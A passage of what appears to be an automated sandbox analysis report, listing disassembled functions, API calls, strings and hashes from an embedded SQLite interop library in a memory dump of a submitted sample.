                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?,?,00000002,00000008,?,?,00000001,00000002,00000000), ref: 6C42E7B6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I46481015c7f49c68.$I9c6d7cd7b7d38055.
                                                                                      • String ID: 0$0$9$CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                                                                                      • API String ID: 3896495839-1548590680
                                                                                      • Opcode ID: f012694b06c82e0a53e0b283cc9ef21c78a9159f16576f1a85493abaf0e4c266
                                                                                      • Instruction ID: 4e0f0a8ad2ba74cb9ed5f12314218201fcaa94d99b4c4e394eced76e7800f8ba
                                                                                      • Opcode Fuzzy Hash: f012694b06c82e0a53e0b283cc9ef21c78a9159f16576f1a85493abaf0e4c266
                                                                                      • Instruction Fuzzy Hash: EB213771A055066EE301CA39DC82FDAB7A8EF8571EF08455DE484D6B81E738E528C3E2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4DCC30 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 37COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,invalid,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC68
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: API call with %s database connection pointer$NULL$invalid$unopened
                                                                                      • API String ID: 1952225102-406007132
                                                                                      • Opcode ID: c97077de7ca22d55424b32c762cc5e595fba92ef8b065181142a70bb634aec05
                                                                                      • Instruction ID: f631d2e4e949116396fde00b8294b9c2a2c6a219a1c57ae58ac50b5619da578b
                                                                                      • Opcode Fuzzy Hash: c97077de7ca22d55424b32c762cc5e595fba92ef8b065181142a70bb634aec05
                                                                                      • Instruction Fuzzy Hash: 53E065616591C512ED18F1B87C21FD9138387C270FF6509AEF23595F81EA0864572096
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C446550 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 34COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,invalid), ref: 6C446578
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000295A3,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,00000015,API call with %s database connection pointer,invalid), ref: 6C446593
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C44658C
                                                                                      • misuse, xrefs: 6C446587
                                                                                      • API call with %s database connection pointer, xrefs: 6C446571
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C44657D
                                                                                      • invalid, xrefs: 6C44656C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$invalid$misuse
                                                                                      • API String ID: 1952225102-20814075
                                                                                      • Opcode ID: ff8118d1ea2441f30d7d7143dcfe609f4c37ae7851808214d465d12ffe914d15
                                                                                      • Instruction ID: d6457381cf3bb8a122cd43c7c3f3dcc619085bc1fee0b7032077a58308070c70
                                                                                      • Opcode Fuzzy Hash: ff8118d1ea2441f30d7d7143dcfe609f4c37ae7851808214d465d12ffe914d15
                                                                                      • Instruction Fuzzy Hash: B7F027307059CC2BFE00D690FC51FE63786C78032EF688582F23C9FF92C665A4900181
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3E6310 Relevance: 12.1, APIs: 8, Instructions: 111COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI863e1ae0679961f5.SQLITE.INTEROP ref: 6C3E6344
                                                                                      • SI1527d54f96ad891e.SQLITE.INTEROP(?,00000000), ref: 6C3E637D
                                                                                      • SI1527d54f96ad891e.SQLITE.INTEROP(?,00000000), ref: 6C3E6394
                                                                                      • SI4abff63f9a080046.SQLITE.INTEROP ref: 6C3E63A4
                                                                                      • SIea8388f7613ed158.SQLITE.INTEROP ref: 6C3E63B4
                                                                                      • SI1527d54f96ad891e.SQLITE.INTEROP(?,00000000,?), ref: 6C3E63C7
                                                                                      • SIea8388f7613ed158.SQLITE.INTEROP ref: 6C3E63E7
                                                                                      • SI1527d54f96ad891e.SQLITE.INTEROP(?,?,?), ref: 6C3E641C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1527d54f96ad891e.$Iea8388f7613ed158.$I4abff63f9a080046.I863e1ae0679961f5.
                                                                                      • String ID:
                                                                                      • API String ID: 4159107687-0
                                                                                      • Opcode ID: 65c7ea1cd34be6e1a9e14143a4a5e9a4e9af998aaeb920f4e6d3376cae392cb0
                                                                                      • Instruction ID: 32d2488a33f7d92ab6a53ae5b01f3aac63dd05d1da7f1ec0e4231725974e402e
                                                                                      • Opcode Fuzzy Hash: 65c7ea1cd34be6e1a9e14143a4a5e9a4e9af998aaeb920f4e6d3376cae392cb0
                                                                                      • Instruction Fuzzy Hash: 12213AB7A0051857C601AB69BC40DEB77B9DFC912CB14427AEE09D6711FB27C4298BE3
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C486C00 Relevance: 10.8, APIs: 7, Instructions: 286COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIea8388f7613ed158.SQLITE.INTEROP(?), ref: 6C486D0D
                                                                                      • SIea8388f7613ed158.SQLITE.INTEROP(?), ref: 6C486D33
                                                                                      • SI943321d364f02e5d.SQLITE.INTEROP(?), ref: 6C486E9B
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?), ref: 6C486EA7
                                                                                      • SI69d8a1d378771295.SQLITE.INTEROP(?), ref: 6C486F03
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?), ref: 6C486F0F
                                                                                      • SI9196a02c851acbfb.SQLITE.INTEROP(?,?,00000000,?), ref: 6C486F52
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Iea8388f7613ed158.Ifc350ae509dc2b53.$I69d8a1d378771295.I9196a02c851acbfb.I943321d364f02e5d.
                                                                                      • String ID:
                                                                                      • API String ID: 4253676087-0
                                                                                      • Opcode ID: f99aa62d8e0b2e96ec80111bbefd4ba5a5b36f55ff6b4662090723a995399651
                                                                                      • Instruction ID: 21a5c6329965d07d420c724dd3612345012cc7d59229594aa5a7667a1e9d8c8c
                                                                                      • Opcode Fuzzy Hash: f99aa62d8e0b2e96ec80111bbefd4ba5a5b36f55ff6b4662090723a995399651
                                                                                      • Instruction Fuzzy Hash: 87A1C171A1A2018FC740CF29D850EAABBE2EF8532DF08466DF898D7B51D731D855CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3E453B Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCPInfo.KERNEL32(061AE5F0,061AE5F0,?,7FFFFFFF,?,?,6C3E4814,061AE5F0,061AE5F0,?,061AE5F0,?,?,?,?,061AE5F0), ref: 6C3E45E7
                                                                                      • MultiByteToWideChar.KERNEL32(061AE5F0,00000009,061AE5F0,061AE5F0,00000000,00000000,?,6C3E4814,061AE5F0,061AE5F0,?,061AE5F0,?,?,?,?), ref: 6C3E466A
                                                                                      • MultiByteToWideChar.KERNEL32(061AE5F0,00000001,061AE5F0,061AE5F0,00000000,6C3E4814,?,6C3E4814,061AE5F0,061AE5F0,?,061AE5F0,?,?,?,?), ref: 6C3E46FD
                                                                                      • MultiByteToWideChar.KERNEL32(061AE5F0,00000009,061AE5F0,061AE5F0,00000000,00000000,?,6C3E4814,061AE5F0,061AE5F0,?,061AE5F0,?,?,?,?), ref: 6C3E4714
                                                                                        • Part of subcall function 6C3D7B2E: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,6C3E2DBE,00000001,00000000,?,6C3DF029,00000001,00000004,00000000,00000001,?,?,6C3D7833), ref: 6C3D7B60
                                                                                      • MultiByteToWideChar.KERNEL32(061AE5F0,00000001,061AE5F0,061AE5F0,00000000,061AE5F0,?,6C3E4814,061AE5F0,061AE5F0,?,061AE5F0,?,?,?,?), ref: 6C3E4790
                                                                                      • __freea.LIBCMT ref: 6C3E47BB
                                                                                      • __freea.LIBCMT ref: 6C3E47C7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$__freea$AllocHeapInfo
                                                                                      • String ID:
                                                                                      • API String ID: 2171645-0
                                                                                      • Opcode ID: 9cce5804e8f59c433682420119f4112cf866786e7461cfbbb22a549b05b06ddb
                                                                                      • Instruction ID: c4dc1b8b259fb8ebefc8faeaa82cb1ee12897a47818d585dcd3b84033bcf4309
                                                                                      • Opcode Fuzzy Hash: 9cce5804e8f59c433682420119f4112cf866786e7461cfbbb22a549b05b06ddb
                                                                                      • Instruction Fuzzy Hash: 9791D672E012269BDF108EE5C880EDE7BB59F0E718F15465BE924E7A80D736D844CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C490E60 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 235COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___swprintf_l
                                                                                      • String ID: "$"$CREATE TABLE
                                                                                      • API String ID: 48624451-2409258398
                                                                                      • Opcode ID: 68cdd255a01cd308f8e42a81015453797eae32ae70a74c5ebc2eb2503f046770
                                                                                      • Instruction ID: a1f08fd32e8d47857011a4b50fd61d5a3039a00fa73b58671f85cb46d116da9b
                                                                                      • Opcode Fuzzy Hash: 68cdd255a01cd308f8e42a81015453797eae32ae70a74c5ebc2eb2503f046770
                                                                                      • Instruction Fuzzy Hash: B391E071A042659FDF04CF64C844FAEFBB5EF49308F1846A9D855A7B01D776EA09CB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C41C4B0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 225COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(?,00000001,00000000,?,?,?,?), ref: 6C41C514
                                                                                      • SI5b7374ef2d63d8eb.SQLITE.INTEROP(?,00000001,?,?,?,?,?,?), ref: 6C41C556
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00015025,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,?,?), ref: 6C41C6B2
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C41C6AB
                                                                                      • misuse, xrefs: 6C41C6A6
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C41C69C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I46481015c7f49c68.I5b7374ef2d63d8eb.I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 3119523221-1203237178
                                                                                      • Opcode ID: ee6ac09c3ee1c9c3ed10ea3237edb1a03e41fc2545d48dafe90278e6ace7b190
                                                                                      • Instruction ID: 45eb2476041e69f29f3aa17c265244e872992d838217b154575fdf72883e6dcb
                                                                                      • Opcode Fuzzy Hash: ee6ac09c3ee1c9c3ed10ea3237edb1a03e41fc2545d48dafe90278e6ace7b190
                                                                                      • Instruction Fuzzy Hash: 6C81A275A082408FD301EF28CC80E6AB7E2BFC9359F15566CF8D89BB51DB35D9068B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3F89E0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 223COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,Yg?l,00000000,?,?,6C3F6759,?), ref: 6C3F89F3
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,?,6C3F6759,?), ref: 6C3F89FE
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,?,?,?,6C3F6759,?), ref: 6C3F8A54
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,?,?,6C3F6759), ref: 6C3F8A7A
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,?,?,?,6C3F6759), ref: 6C3F8A83
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ifc350ae509dc2b53.
                                                                                      • String ID: Yg?l
                                                                                      • API String ID: 223094752-3322103262
                                                                                      • Opcode ID: a3133c889e087bc457ac37c46e58a7a6c4be2ee55ea4b4b5f2ace025a0892b2f
                                                                                      • Instruction ID: d186edc7b859a8664de2df41cf164c142197ff9b8f3723a271fa73f74e1ece0f
                                                                                      • Opcode Fuzzy Hash: a3133c889e087bc457ac37c46e58a7a6c4be2ee55ea4b4b5f2ace025a0892b2f
                                                                                      • Instruction Fuzzy Hash: 59818FB1A026119BDF059B669C4EA4A7774BF0331CB060425EC2693A01D736E9A6CFDB
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C478C90 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 220COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(6C4F8C10,00000000), ref: 6C478D0A
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(6C4F8C10,00000000), ref: 6C478ED2
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?), ref: 6C478EF1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.$I9c6d7cd7b7d38055.
                                                                                      • String ID: %Q.$=%Q$PRAGMA
                                                                                      • API String ID: 3751158470-2099833060
                                                                                      • Opcode ID: 56e8dbb4815b8ae5e1debc6800f59c10bd9b402b62338238d74e884361193516
                                                                                      • Instruction ID: 449ffc0a1292b5d52e168c0d2ffe0b7177ce92b27d98c32befd79dfc61c65977
                                                                                      • Opcode Fuzzy Hash: 56e8dbb4815b8ae5e1debc6800f59c10bd9b402b62338238d74e884361193516
                                                                                      • Instruction Fuzzy Hash: 6B711371A052018BEB20CF24D844F9AB7A0EF8531DF19452EE855ABB41E731E949CBE2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C40C0A0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 184COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(%z%.*s,?,?,00000000), ref: 6C40C23B
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?), ref: 6C40C269
                                                                                      • SI633e1c91fb9a8aa1.SQLITE.INTEROP(?,00000000), ref: 6C40C279
                                                                                      Strings
                                                                                      • wrong number of arguments to function highlight(), xrefs: 6C40C0B5
                                                                                      • %z%.*s, xrefs: 6C40C236
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.I633e1c91fb9a8aa1.Ifc350ae509dc2b53.
                                                                                      • String ID: %z%.*s$wrong number of arguments to function highlight()
                                                                                      • API String ID: 234322358-2055189131
                                                                                      • Opcode ID: 5a3c09eac39fc10b86377003c3601a34f0a9f618ee67c64682c76c32c96fe176
                                                                                      • Instruction ID: 018f9686886e95c2bd80ff5692795323130b1a8cd8bfb3c28f205be75b14142a
                                                                                      • Opcode Fuzzy Hash: 5a3c09eac39fc10b86377003c3601a34f0a9f618ee67c64682c76c32c96fe176
                                                                                      • Instruction Fuzzy Hash: D651B731B88201DBD700EF54C840E5BB3A59B85319F24467DEC659BB82D736D846CAF3
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3EFC00 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 163COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(wrong number of vtable arguments), ref: 6C3EFC89
                                                                                      • SIfdb97bb7d9d0d622.SQLITE.INTEROP(?,?), ref: 6C3EFD1F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.Ifdb97bb7d9d0d622.
                                                                                      • String ID: D!Pl$l!Pl$temp$wrong number of vtable arguments
                                                                                      • API String ID: 3260204670-2475745670
                                                                                      • Opcode ID: 352f7dbc3df152d87ed60ebc8d72f2b388bd0d17181bfdb6e502fcb72237ac4a
                                                                                      • Instruction ID: 0811de9ec6a2a713e85c2ea3f349831b5517f25416dca8d80c42ea917f2d3fd0
                                                                                      • Opcode Fuzzy Hash: 352f7dbc3df152d87ed60ebc8d72f2b388bd0d17181bfdb6e502fcb72237ac4a
                                                                                      • Instruction Fuzzy Hash: 40515F755087118FC710CF18E480A5BBBF1AF8D318F144A2EE89987B15D732E90ACF96
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4C80B0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 152COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,00010F1A,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,00000000,?), ref: 6C4C80E5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$database corruption
                                                                                      • API String ID: 1952225102-2363313300
                                                                                      • Opcode ID: 5b23d60d4e429a821f40cca92dd6e89b1f7134b6b6545c48b676b1a4053fdec6
                                                                                      • Instruction ID: aa106b1d6511a6cac05d86f471dfc338ebbf35954cd1c831b8302d29ea993a67
                                                                                      • Opcode Fuzzy Hash: 5b23d60d4e429a821f40cca92dd6e89b1f7134b6b6545c48b676b1a4053fdec6
                                                                                      • Instruction Fuzzy Hash: 3A412679B051489BC710CF5AC884EAAB7F0EB8431AF24496AE84DD7F51EB71E981C781
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4AC9E0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 135COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?,?,?,?,?,?,6C4ABFA1,?,?,?,?,?,?,?), ref: 6C4ACA23
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
